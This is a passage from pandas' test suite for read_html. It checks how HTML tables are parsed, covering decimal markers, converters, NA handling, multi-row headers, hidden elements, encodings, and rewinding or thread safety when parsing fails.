""",
        header=[0, 1],
    )
    expected = DataFrame(
        [["a", "b"]],
        columns=MultiIndex.from_tuples(
            [("Unnamed: 0_level_0", "A"), ("Unnamed: 1_level_0", "B")]
        ),
    )
    tm.assert_frame_equal(result[0], expected)
def test_decimal_rows(self):
    # GH 12907
    # A custom decimal marker ('#') must be honoured when coercing floats.
    result = self.read_html(
        """<html>
<body>
<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>1100#101</td>
</tr>
</tbody>
</table>
</body>
</html>""",
        decimal="#",
    )[0]
    expected = DataFrame(data={"Header": 1100.101}, index=[0])
    assert result["Header"].dtype == np.dtype("float64")
    tm.assert_frame_equal(result, expected)
def test_bool_header_arg(self):
    """header=True/False must be rejected with a TypeError (GH 6114)."""
    msg = re.escape(
        "Passing a bool to header is invalid. Use header=None for no header or "
        "header=int or list-like of ints to specify the row(s) making up the "
        "column names"
    )
    for bad_header in (True, False):
        with pytest.raises(TypeError, match=msg):
            self.read_html(self.spam_data, header=bad_header)
def test_converters(self):
    # GH 13461
    # A per-column converter must win over default numeric coercion,
    # keeping column "a" as (stripped) strings.
    result = self.read_html(
        """<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
        converters={"a": str},
    )[0]
    expected = DataFrame({"a": ["0.763", "0.244"]})
    tm.assert_frame_equal(result, expected)
def test_na_values(self):
    # GH 13461
    # Values listed in na_values (compared after numeric coercion) become NaN.
    result = self.read_html(
        """<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
        na_values=[0.244],
    )[0]
    expected = DataFrame({"a": [0.763, np.nan]})
    tm.assert_frame_equal(result, expected)
def test_keep_default_na(self):
    """keep_default_na toggles whether 'N/A'/'NA' sentinels become NaN."""
    html_data = """<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> N/A</td>
</tr>
<tr>
<td> NA</td>
</tr>
</tbody>
</table>"""
    # Default sentinels disabled: the literal strings survive.
    expected_df = DataFrame({"a": ["N/A", "NA"]})
    html_df = self.read_html(html_data, keep_default_na=False)[0]
    tm.assert_frame_equal(expected_df, html_df)
    # Default sentinels enabled: both cells become NaN.
    expected_df = DataFrame({"a": [np.nan, np.nan]})
    html_df = self.read_html(html_data, keep_default_na=True)[0]
    tm.assert_frame_equal(expected_df, html_df)
def test_preserve_empty_rows(self):
    """A row of empty cells is kept as a NaN row, not dropped."""
    result = self.read_html(
        """
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
</tr>
<tr>
<td></td>
<td></td>
</tr>
</table>
"""
    )[0]
    expected = DataFrame(data=[["a", "b"], [np.nan, np.nan]], columns=["A", "B"])
    tm.assert_frame_equal(result, expected)
def test_ignore_empty_rows_when_inferring_header(self):
    """An all-empty leading header row is skipped when inferring the header."""
    # NOTE: the unclosed <th></tr> on the first row is deliberately
    # malformed; the two following th-rows form a MultiIndex header.
    result = self.read_html(
        """
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
<tr><th>a</th><th>b</th></tr>
</thead>
<tbody>
<tr><td>1</td><td>2</td></tr>
</tbody>
</table>
"""
    )[0]
    columns = MultiIndex(levels=[["A", "B"], ["a", "b"]], codes=[[0, 1], [0, 1]])
    expected = DataFrame(data=[[1, 2]], columns=columns)
    tm.assert_frame_equal(result, expected)
def test_multiple_header_rows(self):
    """Round-trip a two-level column header through to_html/read_html (GH 13434)."""
    expected_df = DataFrame(
        data=[("Hillary", 68, "D"), ("Bernie", 74, "D"), ("Donald", 69, "R")]
    )
    expected_df.columns = [
        ["Unnamed: 0_level_0", "Age", "Party"],
        ["Name", "Unnamed: 1_level_1", "Unnamed: 2_level_1"],
    ]
    html_df = self.read_html(expected_df.to_html(index=False))[0]
    tm.assert_frame_equal(expected_df, html_df)
def test_works_on_valid_markup(self, datapath):
    """A well-formed HTML file parses into a list of DataFrames."""
    filename = datapath("io", "data", "html", "valid_markup.html")
    tables = self.read_html(filename, index_col=0)
    assert isinstance(tables, list)
    assert isinstance(tables[0], DataFrame)
@pytest.mark.slow
def test_fallback_success(self, datapath):
    """Parsing succeeds when the first flavor (lxml) falls back to html5lib."""
    banklist_data = datapath("io", "data", "html", "banklist.html")
    self.read_html(banklist_data, match=".*Water.*", flavor=["lxml", "html5lib"])
def test_to_html_timestamp(self):
    """to_html renders a DatetimeIndex entry as an ISO date string."""
    rng = date_range("2000-01-01", periods=10)
    frame = DataFrame(np.random.randn(10, 4), index=rng)
    assert "2000-01-01" in frame.to_html()
@pytest.mark.parametrize(
    "displayed_only,exp0,exp1",
    [
        (True, DataFrame(["foo"]), None),
        (False, DataFrame(["foo bar baz qux"]), DataFrame(["foo"])),
    ],
)
def test_displayed_only(self, displayed_only, exp0, exp1):
    # GH 20027
    # displayed_only=True must drop content hidden via display:none,
    # both inline spans and whole tables.
    data = StringIO(
        """<html>
<body>
<table>
<tr>
<td>
foo
<span style="display:none;text-align:center">bar</span>
<span style="display:none">baz</span>
<span style="display: none">qux</span>
</td>
</tr>
</table>
<table style="display: none">
<tr>
<td>foo</td>
</tr>
</table>
</body>
</html>"""
    )
    dfs = self.read_html(data, displayed_only=displayed_only)
    tm.assert_frame_equal(dfs[0], exp0)
    if exp1 is not None:
        tm.assert_frame_equal(dfs[1], exp1)
    else:
        assert len(dfs) == 1  # Should not parse hidden table
@pytest.mark.filterwarnings(
    "ignore:You provided Unicode markup but also provided a value for "
    "from_encoding.*:UserWarning"
)
def test_encode(self, html_encoding_file):
    """Bytes, BytesIO, and filename inputs must all decode to the same frame."""
    # Fixture files are named "<stem>_<encoding>.html"; recover the encoding.
    base_path = os.path.basename(html_encoding_file)
    root = os.path.splitext(base_path)[0]
    _, encoding = root.split("_")
    try:
        with open(html_encoding_file, "rb") as fobj:
            from_string = self.read_html(
                fobj.read(), encoding=encoding, index_col=0
            ).pop()
        with open(html_encoding_file, "rb") as fobj:
            from_file_like = self.read_html(
                BytesIO(fobj.read()), encoding=encoding, index_col=0
            ).pop()
        from_filename = self.read_html(
            html_encoding_file, encoding=encoding, index_col=0
        ).pop()
        tm.assert_frame_equal(from_string, from_file_like)
        tm.assert_frame_equal(from_string, from_filename)
    except Exception:
        # seems utf-16/32 fail on windows
        if is_platform_windows():
            if "16" in encoding or "32" in encoding:
                pytest.skip()
        raise
def test_parse_failure_unseekable(self):
    # Issue #17975
    if self.read_html.keywords.get("flavor") == "lxml":
        pytest.skip("Not applicable for lxml")

    class UnseekableStringIO(StringIO):
        # Simulates a stream that cannot be rewound after a failed parse.
        def seekable(self):
            return False

    bad = UnseekableStringIO(
        """
<table><tr><td>spam<foobr />eggs</td></tr></table>"""
    )
    # First call consumes the stream but still yields a result.
    assert self.read_html(bad)
    # Second call cannot rewind the exhausted stream and must raise.
    with pytest.raises(ValueError, match="passed a non-rewindable file object"):
        self.read_html(bad)
def test_parse_failure_rewinds(self):
    # Issue #17975
    # A seekable file object must be rewound and re-read after an
    # initial parse failure.
    class MockFile:
        def __init__(self, data):
            self.data = data
            self.at_end = False

        def read(self, size=None):
            # Returns everything on the first read, "" afterwards, so a
            # retry without seek(0) would see an empty document.
            data = "" if self.at_end else self.data
            self.at_end = True
            return data

        def seek(self, offset):
            self.at_end = False

        def seekable(self):
            return True

        def __iter__(self):
            # to fool `is_file_like`, should never end up here
            assert False

    good = MockFile("<table><tr><td>spam<br />eggs</td></tr></table>")
    bad = MockFile("<table><tr><td>spam<foobr />eggs</td></tr></table>")
    assert self.read_html(good)
    assert self.read_html(bad)
@pytest.mark.slow
def test_importcheck_thread_safety(self, datapath):
    # see gh-16928
    # Two threads running read_html concurrently right after a module
    # reload must both complete without raising.

    class ErrorThread(threading.Thread):
        """Thread that records any exception raised by its target in .err."""

        def run(self):
            try:
                super().run()
            except Exception as err:
                self.err = err
            else:
                self.err = None

    # force import check by reinitialising global vars in html.py
    reload(pandas.io.html)

    filename = datapath("io", "data", "html", "valid_markup.html")
    helper_thread1 = ErrorThread(target=self.read_html, args=(filename,))
    helper_thread2 = ErrorThread(target=self.read_html, args=(filename,))

    helper_thread1.start()
    helper_thread2.start()
    # join() blocks until each thread finishes without the CPU-burning
    # busy-wait of polling is_alive() in a tight loop.
    helper_thread1.join()
    helper_thread2.join()

    assert None is helper_thread1.err is helper_thread2.err
def test_parse_path_object(self, datapath):
    """read_html accepts a pathlib.Path just like a string path (GH 37705)."""
    file_path_string = datapath("io", "data", "html", "spam.html")
    from_string = self.read_html(file_path_string)[0]
    from_path = self.read_html(Path(file_path_string))[0]
    tm.assert_frame_equal(from_string, from_path)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.